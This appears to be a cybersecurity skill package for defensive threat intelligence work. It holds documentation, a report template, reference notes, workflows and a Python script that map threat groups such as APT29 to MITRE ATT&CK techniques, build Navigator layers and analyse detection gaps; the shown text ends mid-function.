description: MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. This skill covers systematically mapping threat actor beh
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [threat-intelligence, cti, ioc, mitre-attack, stix, ttp-analysis, threat-actors]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Threat Actor TTPs with MITRE ATT&CK
|
||||
|
||||
## Overview
|
||||
|
||||
MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. This skill covers systematically mapping threat actor behavior to the ATT&CK framework, building technique coverage heatmaps using the ATT&CK Navigator, identifying detection gaps, and producing actionable intelligence reports that link observed IOCs to specific adversary techniques across the Enterprise, Mobile, and ICS matrices.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `mitreattack-python`, `attackcti`, `stix2` libraries
|
||||
- MITRE ATT&CK Navigator (web-based or local deployment)
|
||||
- Understanding of ATT&CK matrix structure: Tactics, Techniques, Sub-techniques
|
||||
- Access to threat intelligence reports or MISP/OpenCTI for threat actor data
|
||||
- Familiarity with STIX 2.1 Attack Pattern objects
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### ATT&CK Matrix Structure
|
||||
|
||||
The ATT&CK Enterprise matrix organizes adversary behavior into 14 Tactics (the "why") containing Techniques (the "how") and Sub-techniques (specific implementations). Each technique has associated data sources, detections, mitigations, and real-world procedure examples from observed threat groups.
|
||||
|
||||
### Threat Group Profiles
|
||||
|
||||
ATT&CK catalogs over 140 threat groups (e.g., APT28, APT29, Lazarus Group, FIN7) with documented technique usage. Each group profile includes aliases, targeted sectors, associated campaigns, software used, and technique mappings with procedure-level detail.
|
||||
|
||||
### ATT&CK Navigator
|
||||
|
||||
The ATT&CK Navigator is a web-based tool for creating custom ATT&CK matrix visualizations. Analysts create layers (JSON files) that annotate techniques with scores, colors, comments, and metadata to visualize threat actor coverage, detection capabilities, or risk assessments.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Query ATT&CK Data Programmatically
|
||||
|
||||
```python
|
||||
from attackcti import attack_client
|
||||
import json
|
||||
|
||||
# Initialize ATT&CK client (queries MITRE TAXII server)
|
||||
lift = attack_client()
|
||||
|
||||
# Get all Enterprise techniques
|
||||
enterprise_techniques = lift.get_enterprise_techniques()
|
||||
print(f"Total Enterprise techniques: {len(enterprise_techniques)}")
|
||||
|
||||
# Get all threat groups
|
||||
groups = lift.get_groups()
|
||||
print(f"Total threat groups: {len(groups)}")
|
||||
|
||||
# Get specific group by name
|
||||
apt29 = [g for g in groups if 'APT29' in g.get('name', '')]
|
||||
if apt29:
|
||||
group = apt29[0]
|
||||
print(f"Group: {group['name']}")
|
||||
print(f"Aliases: {group.get('aliases', [])}")
|
||||
print(f"Description: {group.get('description', '')[:200]}")
|
||||
```
|
||||
|
||||
### Step 2: Map Threat Actor to ATT&CK Techniques
|
||||
|
||||
```python
|
||||
from attackcti import attack_client
|
||||
|
||||
lift = attack_client()
|
||||
|
||||
# Get techniques used by APT29
|
||||
apt29_techniques = lift.get_techniques_used_by_group("G0016") # APT29 group ID
|
||||
|
||||
technique_map = {}
|
||||
for entry in apt29_techniques:
|
||||
tech_id = entry.get("external_references", [{}])[0].get("external_id", "")
|
||||
tech_name = entry.get("name", "")
|
||||
description = entry.get("description", "")
|
||||
tactic_refs = [
|
||||
phase.get("phase_name", "")
|
||||
for phase in entry.get("kill_chain_phases", [])
|
||||
]
|
||||
|
||||
technique_map[tech_id] = {
|
||||
"name": tech_name,
|
||||
"tactics": tactic_refs,
|
||||
"description": description[:300],
|
||||
}
|
||||
|
||||
print(f"\nAPT29 uses {len(technique_map)} techniques:")
|
||||
for tid, info in sorted(technique_map.items()):
|
||||
print(f" {tid}: {info['name']} [{', '.join(info['tactics'])}]")
|
||||
```
|
||||
|
||||
### Step 3: Generate ATT&CK Navigator Layer
|
||||
|
||||
```python
|
||||
import json
|
||||
|
||||
def create_navigator_layer(group_name, technique_map, description=""):
|
||||
"""Generate ATT&CK Navigator layer JSON for a threat group."""
|
||||
techniques_list = []
|
||||
for tech_id, info in technique_map.items():
|
||||
techniques_list.append({
|
||||
"techniqueID": tech_id,
|
||||
"tactic": info["tactics"][0] if info["tactics"] else "",
|
||||
"color": "#ff6666", # Red for observed techniques
|
||||
"comment": info["description"][:200],
|
||||
"enabled": True,
|
||||
"score": 100,
|
||||
"metadata": [
|
||||
{"name": "group", "value": group_name},
|
||||
],
|
||||
})
|
||||
|
||||
layer = {
|
||||
"name": f"{group_name} TTP Coverage",
|
||||
"versions": {
|
||||
"attack": "16.1",
|
||||
"navigator": "5.1.0",
|
||||
"layer": "4.5",
|
||||
},
|
||||
"domain": "enterprise-attack",
|
||||
"description": description or f"Techniques attributed to {group_name}",
|
||||
"filters": {"platforms": ["Windows", "Linux", "macOS", "Cloud"]},
|
||||
"sorting": 0,
|
||||
"layout": {
|
||||
"layout": "side",
|
||||
"aggregateFunction": "average",
|
||||
"showID": True,
|
||||
"showName": True,
|
||||
"showAggregateScores": False,
|
||||
"countUnscored": False,
|
||||
},
|
||||
"hideDisabled": False,
|
||||
"techniques": techniques_list,
|
||||
"gradient": {
|
||||
"colors": ["#ffffff", "#ff6666"],
|
||||
"minValue": 0,
|
||||
"maxValue": 100,
|
||||
},
|
||||
"legendItems": [
|
||||
{"label": "Observed technique", "color": "#ff6666"},
|
||||
{"label": "Not observed", "color": "#ffffff"},
|
||||
],
|
||||
"showTacticRowBackground": True,
|
||||
"tacticRowBackground": "#dddddd",
|
||||
"selectTechniquesAcrossTactics": True,
|
||||
"selectSubtechniquesWithParent": False,
|
||||
"selectVisibleTechniques": False,
|
||||
}
|
||||
|
||||
return layer
|
||||
|
||||
|
||||
# Generate and save layer
|
||||
layer = create_navigator_layer("APT29", technique_map, "APT29 (Cozy Bear) TTP analysis")
|
||||
with open("apt29_navigator_layer.json", "w") as f:
|
||||
json.dump(layer, f, indent=2)
|
||||
print("[+] Navigator layer saved to apt29_navigator_layer.json")
|
||||
```
|
||||
|
||||
### Step 4: Identify Detection Gaps
|
||||
|
||||
```python
|
||||
from attackcti import attack_client
|
||||
|
||||
lift = attack_client()
|
||||
|
||||
# Get all techniques with data sources
|
||||
all_techniques = lift.get_enterprise_techniques()
|
||||
|
||||
# Build data source coverage map
|
||||
data_source_coverage = {}
|
||||
for tech in all_techniques:
|
||||
tech_id = tech.get("external_references", [{}])[0].get("external_id", "")
|
||||
data_sources = tech.get("x_mitre_data_sources", [])
|
||||
|
||||
for ds in data_sources:
|
||||
if ds not in data_source_coverage:
|
||||
data_source_coverage[ds] = []
|
||||
data_source_coverage[ds].append(tech_id)
|
||||
|
||||
# Compare threat actor techniques against available detections
|
||||
detected_techniques = {"T1059", "T1071", "T1566"} # Example: techniques you can detect
|
||||
actor_techniques = set(technique_map.keys())
|
||||
|
||||
covered = actor_techniques.intersection(detected_techniques)
|
||||
gaps = actor_techniques - detected_techniques
|
||||
|
||||
print(f"\n=== Detection Gap Analysis for APT29 ===")
|
||||
print(f"Actor techniques: {len(actor_techniques)}")
|
||||
print(f"Detected: {len(covered)} ({len(covered)/len(actor_techniques)*100:.0f}%)")
|
||||
print(f"Gaps: {len(gaps)} ({len(gaps)/len(actor_techniques)*100:.0f}%)")
|
||||
print(f"\nUndetected techniques:")
|
||||
for tech_id in sorted(gaps):
|
||||
if tech_id in technique_map:
|
||||
print(f" {tech_id}: {technique_map[tech_id]['name']}")
|
||||
```
|
||||
|
||||
### Step 5: Cross-Group Technique Comparison
|
||||
|
||||
```python
|
||||
from attackcti import attack_client
|
||||
|
||||
lift = attack_client()
|
||||
|
||||
# Compare techniques across multiple groups
|
||||
groups_to_compare = {
|
||||
"G0016": "APT29",
|
||||
"G0007": "APT28",
|
||||
"G0032": "Lazarus Group",
|
||||
}
|
||||
|
||||
group_techniques = {}
|
||||
for gid, gname in groups_to_compare.items():
|
||||
techs = lift.get_techniques_used_by_group(gid)
|
||||
tech_ids = set()
|
||||
for t in techs:
|
||||
tid = t.get("external_references", [{}])[0].get("external_id", "")
|
||||
if tid:
|
||||
tech_ids.add(tid)
|
||||
group_techniques[gname] = tech_ids
|
||||
|
||||
# Find common and unique techniques
|
||||
all_groups = list(group_techniques.keys())
|
||||
common_to_all = set.intersection(*group_techniques.values())
|
||||
print(f"\nTechniques common to all {len(all_groups)} groups: {len(common_to_all)}")
|
||||
for tid in sorted(common_to_all):
|
||||
print(f" {tid}")
|
||||
|
||||
for gname, techs in group_techniques.items():
|
||||
unique = techs - set.union(*[t for n, t in group_techniques.items() if n != gname])
|
||||
print(f"\nUnique to {gname}: {len(unique)} techniques")
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- ATT&CK data successfully queried via TAXII server or local copy
|
||||
- Threat actor mapped to specific techniques with procedure examples
|
||||
- ATT&CK Navigator layer JSON is valid and renders correctly
|
||||
- Detection gap analysis identifies unmonitored techniques
|
||||
- Cross-group comparison reveals shared and unique TTPs
|
||||
- Output is actionable for detection engineering prioritization
|
||||
|
||||
## References
|
||||
|
||||
- [MITRE ATT&CK](https://attack.mitre.org/)
|
||||
- [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/)
|
||||
- [attackcti Python Library](https://github.com/OTRF/ATTACK-Python-Client)
|
||||
- [ATT&CK STIX Data](https://github.com/mitre/cti)
|
||||
- [ATT&CK Groups](https://attack.mitre.org/groups/)
|
||||
@@ -0,0 +1,87 @@
|
||||
# Threat Actor TTP Analysis Report Template
|
||||
|
||||
## Report Metadata
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Report ID | TTP-YYYY-NNNN |
|
||||
| Date | YYYY-MM-DD |
|
||||
| Threat Actor | [Group Name] |
|
||||
| ATT&CK ID | G[NNNN] |
|
||||
| Classification | TLP:AMBER |
|
||||
| Analyst | [Name] |
|
||||
|
||||
## Threat Actor Profile
|
||||
|
||||
| Attribute | Detail |
|
||||
|-----------|--------|
|
||||
| Name | |
|
||||
| Aliases | |
|
||||
| Suspected Origin | |
|
||||
| Motivation | Espionage / Financial / Disruption |
|
||||
| Active Since | |
|
||||
| Targeted Sectors | |
|
||||
| Targeted Regions | |
|
||||
| Associated Malware | |
|
||||
|
||||
## TTP Summary
|
||||
|
||||
| Tactic | Technique Count | Key Techniques |
|
||||
|--------|----------------|----------------|
|
||||
| Reconnaissance | | |
|
||||
| Resource Development | | |
|
||||
| Initial Access | | |
|
||||
| Execution | | |
|
||||
| Persistence | | |
|
||||
| Privilege Escalation | | |
|
||||
| Defense Evasion | | |
|
||||
| Credential Access | | |
|
||||
| Discovery | | |
|
||||
| Lateral Movement | | |
|
||||
| Collection | | |
|
||||
| Command and Control | | |
|
||||
| Exfiltration | | |
|
||||
| Impact | | |
|
||||
|
||||
## Detailed Technique Mapping
|
||||
|
||||
### [Tactic Name]
|
||||
|
||||
| ATT&CK ID | Technique | Sub-technique | Procedure Example |
|
||||
|-----------|-----------|---------------|-------------------|
|
||||
| T1566.001 | Phishing | Spearphishing Attachment | Actor sends macro-enabled documents |
|
||||
| | | | |
|
||||
|
||||
## Detection Coverage
|
||||
|
||||
| Status | Count | Percentage |
|
||||
|--------|-------|-----------|
|
||||
| Detected | | % |
|
||||
| Partial Detection | | % |
|
||||
| No Detection (Gap) | | % |
|
||||
|
||||
## Detection Gaps (Priority Order)
|
||||
|
||||
| Priority | ATT&CK ID | Technique | Required Data Source | Effort |
|
||||
|----------|-----------|-----------|---------------------|--------|
|
||||
| 1 | | | | Low/Med/High |
|
||||
| 2 | | | | |
|
||||
|
||||
## Recommended Data Sources
|
||||
|
||||
| Data Source | Techniques Covered | Current Status |
|
||||
|------------|-------------------|----------------|
|
||||
| Process Creation | X techniques | Collecting/Not Collecting |
|
||||
| Network Traffic Flow | X techniques | |
|
||||
| File Monitoring | X techniques | |
|
||||
|
||||
## ATT&CK Navigator Layer
|
||||
|
||||
Layer file: `[group]_navigator_layer.json`
|
||||
|
||||
Load at: https://mitre-attack.github.io/attack-navigator/
|
||||
|
||||
## Recommendations
|
||||
|
||||
1. **Immediate**: Deploy detections for [top 3 gap techniques]
|
||||
2. **Short-term**: Enable [data source] collection to cover N techniques
|
||||
3. **Long-term**: Build behavioral analytics for [tactic] coverage
|
||||
@@ -0,0 +1,89 @@
|
||||
# Standards and Frameworks Reference
|
||||
|
||||
## MITRE ATT&CK Framework
|
||||
|
||||
### Matrix Structure
|
||||
- **Enterprise ATT&CK**: Windows, macOS, Linux, Cloud (AWS, Azure, GCP, SaaS, Office 365), Network, Containers
|
||||
- **Mobile ATT&CK**: Android, iOS
|
||||
- **ICS ATT&CK**: Industrial Control Systems
|
||||
|
||||
### 14 Enterprise Tactics (Kill Chain Order)
|
||||
1. **Reconnaissance** (TA0043): Gathering information for planning
|
||||
2. **Resource Development** (TA0042): Establishing resources for operations
|
||||
3. **Initial Access** (TA0001): Gaining initial foothold
|
||||
4. **Execution** (TA0002): Running adversary-controlled code
|
||||
5. **Persistence** (TA0003): Maintaining access across restarts
|
||||
6. **Privilege Escalation** (TA0004): Gaining higher-level permissions
|
||||
7. **Defense Evasion** (TA0005): Avoiding detection
|
||||
8. **Credential Access** (TA0006): Stealing credentials
|
||||
9. **Discovery** (TA0007): Understanding the environment
|
||||
10. **Lateral Movement** (TA0008): Moving through the environment
|
||||
11. **Collection** (TA0009): Gathering data of interest
|
||||
12. **Command and Control** (TA0011): Communicating with compromised systems
|
||||
13. **Exfiltration** (TA0010): Stealing data
|
||||
14. **Impact** (TA0040): Manipulating, interrupting, or destroying systems
|
||||
|
||||
### Technique Naming Convention
|
||||
- **Technique**: T[NNNN] (e.g., T1059 - Command and Scripting Interpreter)
|
||||
- **Sub-technique**: T[NNNN].[NNN] (e.g., T1059.001 - PowerShell)
|
||||
- **Group**: G[NNNN] (e.g., G0016 - APT29)
|
||||
- **Software**: S[NNNN] (e.g., S0154 - Cobalt Strike)
|
||||
- **Mitigation**: M[NNNN] (e.g., M1049 - Antivirus/Antimalware)
|
||||
|
||||
### Data Sources
|
||||
ATT&CK v16+ uses structured data sources:
|
||||
- Process: Process Creation, Process Access, OS API Execution
|
||||
- File: File Creation, File Modification, File Access
|
||||
- Network Traffic: Network Connection Creation, Network Traffic Flow
|
||||
- Command: Command Execution
|
||||
- Module: Module Load
|
||||
- Windows Registry: Windows Registry Key Modification
|
||||
|
||||
## STIX 2.1 Representation
|
||||
|
||||
### Attack Pattern (SDO)
|
||||
Maps to ATT&CK techniques:
|
||||
```json
|
||||
{
|
||||
"type": "attack-pattern",
|
||||
"id": "attack-pattern--uuid",
|
||||
"name": "Spearphishing Attachment",
|
||||
"external_references": [
|
||||
{"source_name": "mitre-attack", "external_id": "T1566.001"}
|
||||
],
|
||||
"kill_chain_phases": [
|
||||
{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Intrusion Set (SDO)
|
||||
Maps to ATT&CK groups:
|
||||
```json
|
||||
{
|
||||
"type": "intrusion-set",
|
||||
"name": "APT29",
|
||||
"aliases": ["Cozy Bear", "The Dukes", "NOBELIUM"],
|
||||
"goals": ["espionage"],
|
||||
"resource_level": "government"
|
||||
}
|
||||
```
|
||||
|
||||
## ATT&CK Navigator Layer Specification
|
||||
|
||||
### Layer Version 4.5 Schema
|
||||
- `name`: Layer display name
|
||||
- `domain`: enterprise-attack, mobile-attack, ics-attack
|
||||
- `techniques[]`: Array of technique annotations
|
||||
- `techniqueID`: ATT&CK ID
|
||||
- `score`: Numeric score (0-100)
|
||||
- `color`: Hex color override
|
||||
- `comment`: Analyst notes
|
||||
- `enabled`: Show/hide technique
|
||||
- `metadata[]`: Key-value pairs for additional context
|
||||
|
||||
## References
|
||||
- [MITRE ATT&CK Enterprise](https://attack.mitre.org/matrices/enterprise/)
|
||||
- [ATT&CK STIX Data Repository](https://github.com/mitre/cti)
|
||||
- [Navigator Layer Format](https://github.com/mitre-attack/attack-navigator/blob/master/layers/LAYERFORMATv4_5.md)
|
||||
- [ATT&CK Design and Philosophy](https://attack.mitre.org/docs/ATTACK_Design_and_Philosophy_March_2020.pdf)
|
||||
@@ -0,0 +1,90 @@
|
||||
# MITRE ATT&CK Analysis Workflows
|
||||
|
||||
## Workflow 1: Threat Actor TTP Mapping
|
||||
|
||||
```
|
||||
[Threat Report] --> [Extract Behaviors] --> [Map to ATT&CK] --> [Navigator Layer]
|
||||
|
|
||||
v
|
||||
[Detection Priorities]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Report Ingestion**: Obtain threat intelligence report (vendor, OSINT, internal)
|
||||
2. **Behavior Extraction**: Identify adversary actions described in the report
|
||||
3. **Technique Mapping**: Map each behavior to ATT&CK technique IDs using the ATT&CK knowledge base
|
||||
4. **Sub-technique Precision**: Drill down to sub-techniques where procedure details allow
|
||||
5. **Layer Creation**: Generate ATT&CK Navigator layer with mapped techniques
|
||||
6. **Priority Assessment**: Rank techniques by detection feasibility and impact
|
||||
|
||||
## Workflow 2: Detection Gap Analysis
|
||||
|
||||
```
|
||||
[Current Detections] --> [Detection Layer] --> [Overlay with Threat Layer] --> [Gap Layer]
|
||||
|
|
||||
v
|
||||
[Engineering Backlog]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Detection Inventory**: Catalog existing detection rules mapped to ATT&CK techniques
|
||||
2. **Detection Layer**: Create Navigator layer showing detected techniques (green)
|
||||
3. **Threat Layer**: Create layer showing adversary techniques (red)
|
||||
4. **Overlay Analysis**: Combine layers to identify uncovered threat techniques
|
||||
5. **Gap Prioritization**: Rank gaps by threat actor relevance and detection feasibility
|
||||
6. **Engineering Plan**: Create detection engineering backlog from prioritized gaps
|
||||
|
||||
## Workflow 3: Cross-Actor Comparison
|
||||
|
||||
```
|
||||
[Group A TTPs] --+
|
||||
|--> [Intersection Analysis] --> [Common Techniques] --> [Priority Detections]
|
||||
[Group B TTPs] --+ |
|
||||
| v
|
||||
[Group C TTPs] --+ [Unique Techniques per Group]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Group Selection**: Choose threat groups relevant to your industry/region
|
||||
2. **TTP Extraction**: Pull technique lists for each group from ATT&CK
|
||||
3. **Common Analysis**: Find techniques shared across all selected groups
|
||||
4. **Unique Analysis**: Identify techniques unique to specific groups
|
||||
5. **Detection ROI**: Prioritize detections for commonly used techniques (highest coverage ROI)
|
||||
6. **Actor Attribution**: Use unique techniques as potential attribution indicators
|
||||
|
||||
## Workflow 4: Campaign-to-TTP Analysis
|
||||
|
||||
```
|
||||
[Campaign IOCs] --> [Sandbox/Analysis] --> [Behavior Extraction] --> [TTP Mapping]
|
||||
|
|
||||
v
|
||||
[Compare to Known Groups]
|
||||
|
|
||||
v
|
||||
[Attribution Hypothesis]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **IOC Collection**: Gather campaign IOCs (malware hashes, C2 domains, phishing emails)
|
||||
2. **Dynamic Analysis**: Execute samples in sandbox, capture behavioral artifacts
|
||||
3. **Behavior Documentation**: Document file operations, registry changes, network connections, process activity
|
||||
4. **ATT&CK Mapping**: Map observed behaviors to techniques and sub-techniques
|
||||
5. **Group Comparison**: Compare campaign TTPs against known group profiles
|
||||
6. **Attribution Assessment**: Assess likelihood of attribution based on TTP overlap
|
||||
|
||||
## Workflow 5: Threat-Informed Defense
|
||||
|
||||
```
|
||||
[ATT&CK Mappings] --> [Data Source Analysis] --> [Telemetry Assessment] --> [Control Mapping]
|
||||
|
|
||||
v
|
||||
[Security Roadmap]
|
||||
```
|
||||
|
||||
### Steps:
|
||||
1. **Threat Profile**: Identify relevant threat actors and their techniques
|
||||
2. **Data Source Mapping**: Determine which data sources can detect each technique
|
||||
3. **Telemetry Audit**: Assess which data sources are currently collected
|
||||
4. **Control Assessment**: Map existing security controls to technique mitigations
|
||||
5. **Gap Identification**: Find techniques with neither detection nor mitigation coverage
|
||||
6. **Roadmap Creation**: Build security improvement roadmap addressing highest-risk gaps
|
||||
@@ -0,0 +1,353 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
MITRE ATT&CK Threat Actor TTP Analysis Script
|
||||
|
||||
Queries the MITRE ATT&CK STIX data to:
|
||||
- Map threat actor groups to their known techniques
|
||||
- Generate ATT&CK Navigator layers for visualization
|
||||
- Perform detection gap analysis
|
||||
- Compare TTPs across multiple threat groups
|
||||
- Identify high-priority detection opportunities
|
||||
|
||||
Requirements:
|
||||
pip install attackcti mitreattack-python stix2 requests
|
||||
|
||||
Usage:
|
||||
python process.py --group APT29 --output apt29_layer.json
|
||||
python process.py --compare APT28 APT29 "Lazarus Group"
|
||||
python process.py --gap-analysis --detections detections.json --group APT29
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
from collections import defaultdict
|
||||
from typing import Optional
|
||||
|
||||
try:
|
||||
from attackcti import attack_client
|
||||
except ImportError:
|
||||
print("ERROR: attackcti not installed. Run: pip install attackcti")
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
class ATTACKAnalyzer:
|
||||
"""Analyze threat actor TTPs using MITRE ATT&CK."""
|
||||
|
||||
def __init__(self):
|
||||
print("[*] Initializing ATT&CK client (querying MITRE TAXII server)...")
|
||||
self.lift = attack_client()
|
||||
self.groups_cache = None
|
||||
self.techniques_cache = None
|
||||
|
||||
def _get_groups(self):
|
||||
if self.groups_cache is None:
|
||||
self.groups_cache = self.lift.get_groups()
|
||||
return self.groups_cache
|
||||
|
||||
def _get_techniques(self):
|
||||
if self.techniques_cache is None:
|
||||
self.techniques_cache = self.lift.get_enterprise_techniques()
|
||||
return self.techniques_cache
|
||||
|
||||
def find_group(self, name: str) -> Optional[dict]:
|
||||
"""Find a threat group by name or alias."""
|
||||
groups = self._get_groups()
|
||||
for group in groups:
|
||||
if name.lower() == group.get("name", "").lower():
|
||||
return group
|
||||
aliases = group.get("aliases", [])
|
||||
if any(name.lower() == a.lower() for a in aliases):
|
||||
return group
|
||||
return None
|
||||
|
||||
def get_group_techniques(self, group_name: str) -> dict:
|
||||
"""Get all techniques used by a threat group."""
|
||||
group = self.find_group(group_name)
|
||||
if not group:
|
||||
print(f"[-] Group '{group_name}' not found")
|
||||
return {}
|
||||
|
||||
group_id = ""
|
||||
for ref in group.get("external_references", []):
|
||||
if ref.get("source_name") == "mitre-attack":
|
||||
group_id = ref.get("external_id", "")
|
||||
break
|
||||
|
||||
if not group_id:
|
||||
print(f"[-] No ATT&CK ID found for {group_name}")
|
||||
return {}
|
||||
|
||||
techniques = self.lift.get_techniques_used_by_group(group_id)
|
||||
technique_map = {}
|
||||
|
||||
for tech in techniques:
|
||||
tech_id = ""
|
||||
for ref in tech.get("external_references", []):
|
||||
if ref.get("source_name") == "mitre-attack":
|
||||
tech_id = ref.get("external_id", "")
|
||||
break
|
||||
|
||||
if not tech_id:
|
||||
continue
|
||||
|
||||
tactics = [
|
||||
phase.get("phase_name", "")
|
||||
for phase in tech.get("kill_chain_phases", [])
|
||||
]
|
||||
|
||||
technique_map[tech_id] = {
|
||||
"name": tech.get("name", ""),
|
||||
"tactics": tactics,
|
||||
"description": tech.get("description", "")[:500],
|
||||
"platforms": tech.get("x_mitre_platforms", []),
|
||||
"data_sources": tech.get("x_mitre_data_sources", []),
|
||||
}
|
||||
|
||||
print(f"[+] {group_name} ({group_id}): {len(technique_map)} techniques")
|
||||
return technique_map
|
||||
|
||||
def create_navigator_layer(self, group_name: str, technique_map: dict,
|
||||
color: str = "#ff6666") -> dict:
|
||||
"""Generate ATT&CK Navigator layer JSON."""
|
||||
techniques_list = []
|
||||
for tech_id, info in technique_map.items():
|
||||
for tactic in info["tactics"]:
|
||||
techniques_list.append({
|
||||
"techniqueID": tech_id,
|
||||
"tactic": tactic,
|
||||
"color": color,
|
||||
"comment": info["name"],
|
||||
"enabled": True,
|
||||
"score": 100,
|
||||
"metadata": [
|
||||
{"name": "group", "value": group_name},
|
||||
{"name": "platforms", "value": ", ".join(info["platforms"])},
|
||||
],
|
||||
})
|
||||
|
||||
layer = {
|
||||
"name": f"{group_name} TTP Coverage",
|
||||
"versions": {
|
||||
"attack": "16.1",
|
||||
"navigator": "5.1.0",
|
||||
"layer": "4.5",
|
||||
},
|
||||
"domain": "enterprise-attack",
|
||||
"description": f"Techniques attributed to {group_name}",
|
||||
"filters": {
|
||||
"platforms": [
|
||||
"Linux", "macOS", "Windows", "Cloud",
|
||||
"Azure AD", "Office 365", "SaaS", "Google Workspace",
|
||||
]
|
||||
},
|
||||
"sorting": 0,
|
||||
"layout": {
|
||||
"layout": "side",
|
||||
"aggregateFunction": "average",
|
||||
"showID": True,
|
||||
"showName": True,
|
||||
"showAggregateScores": False,
|
||||
"countUnscored": False,
|
||||
},
|
||||
"hideDisabled": False,
|
||||
"techniques": techniques_list,
|
||||
"gradient": {
|
||||
"colors": ["#ffffff", color],
|
||||
"minValue": 0,
|
||||
"maxValue": 100,
|
||||
},
|
||||
"legendItems": [
|
||||
{"label": f"Used by {group_name}", "color": color},
|
||||
{"label": "Not observed", "color": "#ffffff"},
|
||||
],
|
||||
"showTacticRowBackground": True,
|
||||
"tacticRowBackground": "#dddddd",
|
||||
"selectTechniquesAcrossTactics": True,
|
||||
"selectSubtechniquesWithParent": False,
|
||||
"selectVisibleTechniques": False,
|
||||
}
|
||||
|
||||
return layer
|
||||
|
||||
def compare_groups(self, group_names: list) -> dict:
|
||||
"""Compare TTPs across multiple threat groups."""
|
||||
group_techs = {}
|
||||
for name in group_names:
|
||||
techs = self.get_group_techniques(name)
|
||||
group_techs[name] = set(techs.keys())
|
||||
|
||||
if len(group_techs) < 2:
|
||||
print("[-] Need at least 2 groups for comparison")
|
||||
return {}
|
||||
|
||||
all_techniques = set.union(*group_techs.values())
|
||||
common_to_all = set.intersection(*group_techs.values())
|
||||
|
||||
comparison = {
|
||||
"groups": group_names,
|
||||
"total_unique_techniques": len(all_techniques),
|
||||
"common_to_all": sorted(common_to_all),
|
||||
"common_count": len(common_to_all),
|
||||
"per_group": {},
|
||||
}
|
||||
|
||||
for name, techs in group_techs.items():
|
||||
others = set.union(*[t for n, t in group_techs.items() if n != name])
|
||||
unique = techs - others
|
||||
|
||||
comparison["per_group"][name] = {
|
||||
"total": len(techs),
|
||||
"unique": sorted(unique),
|
||||
"unique_count": len(unique),
|
||||
"overlap_percentage": round(
|
||||
len(techs.intersection(others)) / len(techs) * 100, 1
|
||||
) if techs else 0,
|
||||
}
|
||||
|
||||
# Technique frequency across groups
|
||||
tech_freq = defaultdict(list)
|
||||
for name, techs in group_techs.items():
|
||||
for t in techs:
|
||||
tech_freq[t].append(name)
|
||||
|
||||
comparison["technique_frequency"] = {
|
||||
t: {"count": len(g), "groups": g}
|
||||
for t, g in sorted(tech_freq.items(), key=lambda x: -len(x[1]))
|
||||
}
|
||||
|
||||
return comparison
|
||||
|
||||
def gap_analysis(self, group_name: str,
|
||||
detected_techniques: set) -> dict:
|
||||
"""Analyze detection gaps for a specific threat group."""
|
||||
actor_techs = self.get_group_techniques(group_name)
|
||||
actor_tech_ids = set(actor_techs.keys())
|
||||
|
||||
covered = actor_tech_ids.intersection(detected_techniques)
|
||||
gaps = actor_tech_ids - detected_techniques
|
||||
|
||||
gap_details = []
|
||||
for tech_id in sorted(gaps):
|
||||
info = actor_techs.get(tech_id, {})
|
||||
gap_details.append({
|
||||
"technique_id": tech_id,
|
||||
"name": info.get("name", ""),
|
||||
"tactics": info.get("tactics", []),
|
||||
"data_sources": info.get("data_sources", []),
|
||||
"platforms": info.get("platforms", []),
|
||||
})
|
||||
|
||||
analysis = {
|
||||
"group": group_name,
|
||||
"total_actor_techniques": len(actor_tech_ids),
|
||||
"detected": len(covered),
|
||||
"gaps": len(gaps),
|
||||
"coverage_percentage": round(
|
||||
len(covered) / len(actor_tech_ids) * 100, 1
|
||||
) if actor_tech_ids else 0,
|
||||
"detected_techniques": sorted(covered),
|
||||
"gap_details": gap_details,
|
||||
"recommended_data_sources": self._recommend_data_sources(gap_details),
|
||||
}
|
||||
|
||||
return analysis
|
||||
|
||||
def _recommend_data_sources(self, gaps: list) -> list:
|
||||
"""Recommend data sources that would close the most gaps."""
|
||||
ds_coverage = defaultdict(list)
|
||||
for gap in gaps:
|
||||
for ds in gap.get("data_sources", []):
|
||||
ds_coverage[ds].append(gap["technique_id"])
|
||||
|
||||
recommendations = [
|
||||
{"data_source": ds, "covers_techniques": techs, "count": len(techs)}
|
||||
for ds, techs in sorted(ds_coverage.items(), key=lambda x: -len(x[1]))
|
||||
]
|
||||
|
||||
return recommendations[:10]
|
||||
|
||||
def tactic_breakdown(self, group_name: str) -> dict:
|
||||
"""Break down threat actor techniques by tactic."""
|
||||
techs = self.get_group_techniques(group_name)
|
||||
tactic_map = defaultdict(list)
|
||||
|
||||
for tech_id, info in techs.items():
|
||||
for tactic in info["tactics"]:
|
||||
tactic_map[tactic].append({
|
||||
"id": tech_id,
|
||||
"name": info["name"],
|
||||
})
|
||||
|
||||
tactic_order = [
|
||||
"reconnaissance", "resource-development", "initial-access",
|
||||
"execution", "persistence", "privilege-escalation",
|
||||
"defense-evasion", "credential-access", "discovery",
|
||||
"lateral-movement", "collection", "command-and-control",
|
||||
"exfiltration", "impact",
|
||||
]
|
||||
|
||||
breakdown = {}
|
||||
for tactic in tactic_order:
|
||||
if tactic in tactic_map:
|
||||
breakdown[tactic] = {
|
||||
"count": len(tactic_map[tactic]),
|
||||
"techniques": tactic_map[tactic],
|
||||
}
|
||||
|
||||
return breakdown
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
